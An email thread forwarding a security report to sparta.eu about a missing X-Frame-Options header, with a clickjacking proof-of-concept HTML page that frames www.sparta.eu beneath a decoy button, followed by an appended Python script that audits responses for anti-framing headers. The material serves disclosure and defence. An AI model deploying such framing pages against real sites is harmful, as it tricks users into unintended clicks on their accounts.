Hello Patrick,
This email is about security issue #5 reported yesterday on security@sparta.eu. It does not seem to be a critical security issue, but it would be better to have the X-Frame-Options header activated at the web server level for the sparta.eu domain and subdomains (together with other security measures such as the CSP frame-ancestors directive, for instance). Could you please have a look at this?
Best regards,
--
Thibaud Antignac
CEA List
From: security <security-bounces@server.sparta.eu> on behalf of Sakshi Patil <sakshipatil017@gmail.com>
Date: Sunday 22 November 2020 at 15:47
To: "security@sparta.eu" <security@sparta.eu>
Subject: [security] (Bug Report) Clickjacking.
Vulnerability Name: Clickjacking
Target URL: https://www.sparta.eu/
Vulnerability Description :
Clickjacking (also called a User Interface redress attack, UI redress attack, or UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
The server did not return an X-Frame-Options header, which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks by ensuring that their content is not embedded into other sites.
Typically there is one type of attack, cross-site request forgery (CSRF), that can interact with functions on other websites.
1) This vulnerability affects the web server.
<html>
<head>
<title>Clickjack test page</title>
<style>
#myBtn {
  z-index: 999;
  position: absolute;
  top: 100px;
  right: 50px;
  color: white;
  background-color: red;
}
</style>
</head>
<body>
<!-- <h1>A Sample Test Page</h1>
<p>Website is vulnerable to clickjacking!</p>
<p>Avoid random clicks</p> -->
<!-- The framed target page sits underneath, covering most of the viewport -->
<div style="z-index:-9999; position:absolute; top:0; left:0; width:70%; height:70%">
<iframe src="https://www.sparta.eu/" name="frame1" width="100%" height="100%">
</iframe></div>
<!-- The visible button is layered on top of the frame -->
<div align="right" style="position:absolute; top:1; left:0; z-index:1; width:70%; height:60%; text-align:left;">
<a href="https://www.sparta.eu/" target="_blank"><button id="myBtn">click here</button></a>
<!-- <a href="https://www.sparta.eu/"><button id="myBtn">Open Modal</button></a> -->
<div id="myModal" class="modal">
<!-- Modal content -->
</div>
</div>
</body>
</html>
2) Save it as <any name>.html, e.g. s.html.
3) Then simply open that file and click on the button (direct login); it redirects to https://www.sparta.eu/
As far as I know, this data is enough to prove that your site is vulnerable to clickjacking.
Impact:
An attacker may trick a user by sending them a malicious link; the user opens it, clicks on some image, and their account has unconsciously been deactivated.
Attachment:
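As an added example (not part of either email above), the following Python checks a response's headers for the two anti-framing controls the thread names, X-Frame-Options and the CSP frame-ancestors directive, the way a server-side audit or CI check for the sparta.eu domains could. The header sets in SAMPLE_RESPONSES are constructed for illustration, not captured from any real server, and the verdict logic follows current browser behaviour (an enforced CSP frame-ancestors directive overrides X-Frame-Options; ALLOW-FROM and Report-Only policies do not block framing).

```python
from typing import Dict, List, Optional, Tuple
# Constructed sample header sets (not captured from any real server).
SAMPLE_RESPONSES: Dict[str, Dict[str, str]] = {
    "no-protection": {"Content-Type": "text/html"},
    "xfo-deny": {"X-Frame-Options": "DENY"},
    "xfo-sameorigin": {"x-frame-options": "sameorigin"},
    "xfo-allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "csp-self": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp-wildcard": {"Content-Security-Policy": "frame-ancestors *"},
    "csp-without-directive": {"Content-Security-Policy": "default-src 'self'"},
    "csp-report-only": {"Content-Security-Policy-Report-Only": "frame-ancestors 'none'"},
}

def _header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive lookup, since HTTP header names are case-insensitive."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None

def csp_frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list, or None if the directive is absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def framing_protection(headers: Dict[str, str]) -> Tuple[bool, str]:
    """(protected, reason): does the response stop other origins framing it?
    An enforced CSP frame-ancestors directive takes precedence over
    X-Frame-Options; a Report-Only policy never blocks anything."""
    csp = _header(headers, "Content-Security-Policy")
    sources = csp_frame_ancestors(csp) if csp else None
    if sources is not None:
        # '*' or a bare scheme lets any site on that scheme frame the page.
        if any(src in ("*", "http:", "https:") for src in sources):
            return False, "frame-ancestors permits any origin"
        return True, "CSP frame-ancestors restricts framing"
    xfo = _header(headers, "X-Frame-Options")
    if xfo is None:
        return False, "no X-Frame-Options and no CSP frame-ancestors"
    if xfo.strip().upper() in ("DENY", "SAMEORIGIN"):
        return True, "X-Frame-Options " + xfo.strip().upper()
    # ALLOW-FROM and malformed values are ignored by current browsers.
    return False, "X-Frame-Options value not enforced: " + xfo

def audit(responses: Dict[str, Dict[str, str]]) -> Dict[str, bool]:
    """Map each sample name to its verdict, e.g. for a scan over many URLs."""
    return {name: framing_protection(hdrs)[0] for name, hdrs in responses.items()}
```

To run it against a live host, feed the dict returned by an HTTP client's response headers into framing_protection instead of the constructed samples.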